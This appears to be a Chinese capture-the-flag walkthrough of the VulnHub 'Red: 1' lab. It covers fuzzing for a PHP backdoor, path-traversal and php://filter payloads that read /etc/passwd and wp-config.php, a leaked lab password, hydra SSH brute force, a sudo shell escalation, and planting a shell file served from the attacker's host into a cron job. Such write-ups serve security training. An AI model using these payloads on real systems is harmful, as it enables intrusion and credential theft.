攻击IP:192.168.56.104靶机IP:192.168.56.101
0X02 信息收集
nmap -v -p 0-65535 192.168.56.101
访问发现没有样式,点击hello,blue!发现跳转一个域名。http://redrocks.win/2021/10/24/hello-world/添加进本地hostsvim /etc/hosts
根据首页提示,网站已经被入侵了,并且被植入了后门文件。进一步查看发现在http://redrocks.win/2021/10/24/hello-world/地址下存在一个提示。
下载下来在里面寻找到一些字典,对其尝试目录爆破。Git clone https://github.com/danielmiessler/SecLists.git最后在这个字典爆破出一个目录SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txtdirb http://redrocks.win/ CommonBackdoors-PHP.fuzz.txt
直接访问返回500,尝试对参数进行爆破wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w burp-parameter-names.txtSecLists/Discovery/Web-Content/burp-parameter-names.txt(网络原因第一次爆破成功,后面一直爆破不出来,图也没办法截取)对参数进行爆破发现了key这个参数,测试发现存在目录遍历漏洞。http://192.168.56.101/NetworkFileManagerPHP.php?key=../../../etc/passwd
Base64读取文件:php://filter/convert.base64-encode/resource=http://192.168.56.101/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php
提示能获取一个密码,并且有个hashcat的规则。这时候就想到了wp的配置文件http://192.168.56.101/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php
帐号:john密码:R3v_m4lwh3r3_k1nG!!
0X03 获取权限
这里的帐号密码直接登录是登录不上的,根据提示要使用hashcat的规则进行爆破。
Kali里面存在很多默认的rules,这里使用的是第一个。hashcat --stdout 1.txt -r /usr/share/hashcat/rules/best64.rule -o 2.txt
前面端口收集22端口是开放的,对其进行爆破尝试hydra -l john -P 2.txt ssh://192.168.56.101
sudo -l
sudo -u ippsec /usr/bin/time /bin/sh
因为一直在弹出一些信息,修改john的密码,就考虑监控下进程。https://github.com/DominicBreuker/pspy/软件可以不在root权限进行进程监控使用python3开一个http文件管理让靶机下载文件。python3 -m http.server 8888http://192.168.56.104:8888/pspy64s很多文件无法下载,最后在/dev/shm目录下下载并使用
尝试将supersecretfileuc.c替换成shell文件https://ddosi.org/shell/
使用python3开服务传上去http://192.168.56.104:8888/supersecretfileuc.c
crontab -l 查看计划任务
可以看见上面几个任务计划一直在执行修改密码等操作。
原文始发于微信公众号(皓月的笔记本):【靶场合集】vulnhub-Red: 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论